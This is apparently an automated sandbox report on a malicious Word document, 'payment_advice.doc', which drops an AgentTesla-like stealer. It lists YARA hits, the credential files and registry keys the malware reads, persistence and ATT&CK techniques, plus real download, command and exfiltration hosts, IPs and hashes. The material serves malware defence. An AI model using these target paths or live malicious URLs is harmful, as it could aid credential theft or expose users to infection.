                      Source: Yara matchFile source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
                      Source: Yara matchFile source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
                      Source: Yara matchFile source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Obfuscated Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Timestomp1Credentials in Registry1Security Software Discovery221SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSVirtualization/Sandbox Evasion14Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion14LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356799 Sample: payment_advice.doc Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->58 60 Found malware configuration 2->60 62 Antivirus detection for URL or domain 2->62 64 10 other signatures 2->64 8 EQNEDT32.EXE 11 2->8         started        13 UGxXf.exe 12 1 2->13         started        15 UGxXf.exe 2->15         started        17 WINWORD.EXE 291 23 2->17         started        process3 dnsIp4 50 tunedinblog.com 150.95.81.183, 49165, 80 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 8->50 40 C:\Users\user\AppData\Roaming\twox67345.exe, PE32 8->40 dropped 42 C:\Users\user\AppData\Local\...\twox[1].exe, PE32 8->42 dropped 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->82 19 twox67345.exe 12 1 8->19         started        52 coroloboxorozor.com 13->52 84 Multi AV Scanner detection for dropped file 13->84 86 Machine Learning detection for dropped file 13->86 88 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 13->88 90 2 other signatures 13->90 23 UGxXf.exe 2 13->23         started        25 cmd.exe 13->25         started        54 coroloboxorozor.com 15->54 file5 signatures6 process7 dnsIp8 46 coroloboxorozor.com 172.67.172.17, 49166, 49168, 49169 CLOUDFLARENETUS United States 19->46 66 Multi AV Scanner detection for dropped file 19->66 68 Machine Learning detection for dropped file 19->68 70 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 19->70 78 2 other signatures 19->78 27 twox67345.exe 1 4 19->27         started        32 cmd.exe 19->32         started        34 twox67345.exe 19->34         started        48 mail.tpcdel.com 23->48 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->72 74 Tries to steal Mail credentials (via file access) 23->74 76 Tries to harvest and steal ftp login credentials 23->76 80 3 other signatures 23->80 36 timeout.exe 25->36         started        signatures9 process10 dnsIp11 56 mail.tpcdel.com 103.35.120.75, 49167, 49170, 49171 STPI-NOIDASoftwareTechnologyParksofIndiaBlock-IVIN India 27->56 44 C:\Users\user\AppData\Roaming\...\UGxXf.exe, PE32 27->44 dropped 92 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->92 94 Tries to steal Mail credentials (via file access) 27->94 96 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->96 98 Installs a global keyboard hook 27->98 38 timeout.exe 32->38         started        file12 signatures13 process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      payment_advice.doc44%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\twox67345.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe38%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\AppData\Roaming\twox67345.exe38%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe38%ReversingLabsByteCode-MSIL.Trojan.Generic

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.2.twox67345.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      16.2.UGxXf.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.tpcdel.com2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://tunedinblog.com/wp-includes/twox.exe100%Avira URL Cloudmalware
                      http://coroloboxorozor.com0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html0%Avira URL Cloudsafe
                      https://n2pGpXVLT5FR.net0%Avira URL Cloudsafe
                      http://mail.tpcdel.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.tpcdel.com
                      103.35.120.75
                      truetrueunknown
                      coroloboxorozor.com
                      172.67.172.17
                      truefalse
                        unknown
                        tunedinblog.com
                        150.95.81.183
                        truetrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.htmlfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tunedinblog.com/wp-includes/twox.exetrue
                          • Avira URL Cloud: malware
                          unknown
                          http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.htmlfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://n2pGpXVLT5FR.nettrue
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.%s.comPAtwox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmpfalse
                            high
                            http://coroloboxorozor.comtwox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametwox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpfalse
                              high
                              http://mail.tpcdel.comtwox67345.exe, 00000009.00000002.2360313482.0000000002814000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.172.17
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              150.95.81.183
                              unknownSingapore
                              135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                              103.35.120.75
                              unknownIndia
                              9430STPI-NOIDASoftwareTechnologyParksofIndiaBlock-IVINtrue

                              General Information

                              Joe Sandbox Version:31.0.0 Emerald
                              Analysis ID:356799
                              Start date:23.02.2021
                              Start time:16:53:01
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:payment_advice.doc
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winDOC@20/9@10/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 0.6% (good quality ratio 0.1%)
                              • Quality average: 7.4%
                              • Quality standard deviation: 23.3%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .doc
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              16:53:37API Interceptor127x Sleep call for process: EQNEDT32.EXE modified
                              16:53:43API Interceptor554x Sleep call for process: twox67345.exe modified
                              16:55:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                              16:55:18API Interceptor334x Sleep call for process: UGxXf.exe modified
                              16:55:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              172.67.172.17New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/26C9E19CD43562C78CD12FB7DF6FEC19.html
                              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html
                              SecuriteInfo.com.Variant.Bulz.368783.31325.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/753007B764720AC1F46C7741AC807FF3.html
                              0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                              Payment_pdf.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/4E6D09D3FE7F5C729D5893BBC810E319.html
                              RG6ws8jWUJ.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/45B656EF859B906DB2A5636A30447A39.html
                              VIws8bzjD5.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
                              PURCHASE ITEMS.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/67217E30C926335AF77F6F876C4096EF.html
                              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/B7EE0CB8A1B54170208E8AC026859710.html
                              quotation_PR # 00459182..exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
                              PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/79E1649C3374034D720AAEAD0A4C189E.html
                              XP 6.xlsxGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/753007B764720AC1F46C7741AC807FF3.html
                              PAYRECEIPT.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
                              PO#87498746510.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/DDE952AA72FAB0CCAD37093397BB54C4.html
                              TT.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
                              Payment_pdf.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
                              TT.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
                              Invoices.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/E8B364AD7156AB4D7DED9F03FD919CE3.html
                              Authorization Letter for Hiretech.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/94373684A3FEEB5727B680244074B411.html
                              Doc_3975465846584657465846486435454,pdf.exeGet hashmaliciousBrowse
                              • coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              mail.tpcdel.comVIws8bzjD5.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              30998-pdf.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              swift_copy_pdf.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              76a1YdPyL5.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              purchase_order_pdf.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              wire_transfer.pdf.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              wire transfer payment.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              Payment advice.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              UPDATED SOA.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              2k6NyeiHKE.exeGet hashmaliciousBrowse
                              • 103.35.120.75
                              coroloboxorozor.comNew Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              SecuriteInfo.com.Variant.Bulz.368783.31325.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              PRICE LIST (NOVEMBER 2020).exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              A4-058000200390-10-14_REV_pdf.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              Payment_pdf.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              RG6ws8jWUJ.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              VIws8bzjD5.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              PURCHASE ITEMS.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              quotation_PR # 00459182..exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              XP 6.xlsxGet hashmaliciousBrowse
                              • 172.67.172.17
                              PAYRECEIPT.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              New Order.exeGet hashmaliciousBrowse
                              • 104.21.71.230
                              PO#87498746510.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              TT.exeGet hashmaliciousBrowse
                              • 172.67.172.17

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGOrder KV_RQ-74368121doc.rtfGet hashmaliciousBrowse
                              • 150.95.81.183
                              inquiry.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              receipt.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Purchase Order KVRQ-743012021.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Proforma Invoice.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              902178.rtfGet hashmaliciousBrowse
                              • 150.95.81.183
                              Vendor from.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Proforma Invoice.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              ENQUIRY.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Paymentadvise.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              USD21053.00.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              scan-021521DHL delivery.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              scan-021521DHL delivery doc.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              New Order.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Factura021121_pdf.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              Corporation Bank.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              S519123519485518465.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              SEA LION QUOTATION.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              New Order 09022021.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              PO-202002FIVEBRO.docGet hashmaliciousBrowse
                              • 150.95.81.183
                              CLOUDFLARENETUSPurchase Order.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              dot crypted.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                              • 172.67.172.17
                              Purchase Order list.exeGet hashmaliciousBrowse
                              • 104.21.23.61
                              RkoKlvuLh6.exeGet hashmaliciousBrowse
                              • 162.159.136.232
                              i0fOtOV8v0.exeGet hashmaliciousBrowse
                              • 104.23.99.190
                              P3knxzE7wN.exeGet hashmaliciousBrowse
                              • 162.159.128.233
                              zLyXzE7WZi.exeGet hashmaliciousBrowse
                              • 162.159.138.232
                              wLy18x5e2o.exeGet hashmaliciousBrowse
                              • 162.159.136.232
                              QJ2UZbJWDS.exeGet hashmaliciousBrowse
                              • 162.159.136.232
                              12ojLsHzee.exeGet hashmaliciousBrowse
                              • 162.159.128.233
                              seed.exeGet hashmaliciousBrowse
                              • 104.21.76.242
                              SWW8Mmeq6o.exeGet hashmaliciousBrowse
                              • 162.159.135.232
                              iY2FJ1t6Nk.exeGet hashmaliciousBrowse
                              • 162.159.138.232
                              BIb5AQZOu9.exeGet hashmaliciousBrowse
                              • 104.23.98.190
                              egwbnzACBa.exeGet hashmaliciousBrowse
                              • 162.159.137.232
                              N8MwnxcRDv.exeGet hashmaliciousBrowse
                              • 162.159.137.232
                              7XJCrOkoIy.exeGet hashmaliciousBrowse
                              • 162.159.135.232
                              fNOZjHL61d.exeGet hashmaliciousBrowse
                              • 104.23.98.190

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exeVIws8bzjD5.exeGet hashmaliciousBrowse
                                C:\Users\user\AppData\Roaming\twox67345.exeVIws8bzjD5.exeGet hashmaliciousBrowse
                                  C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeVIws8bzjD5.exeGet hashmaliciousBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:downloaded
                                    Size (bytes):629624
                                    Entropy (8bit):4.318973025796057
                                    Encrypted:false
                                    SSDEEP:6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
                                    MD5:3DC83F17122DD592D607424A54C1E9CB
                                    SHA1:CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
                                    SHA-256:D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                                    SHA-512:53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 38%
                                    Joe Sandbox View:
                                    • Filename: VIws8bzjD5.exe, Detection: malicious, Browse
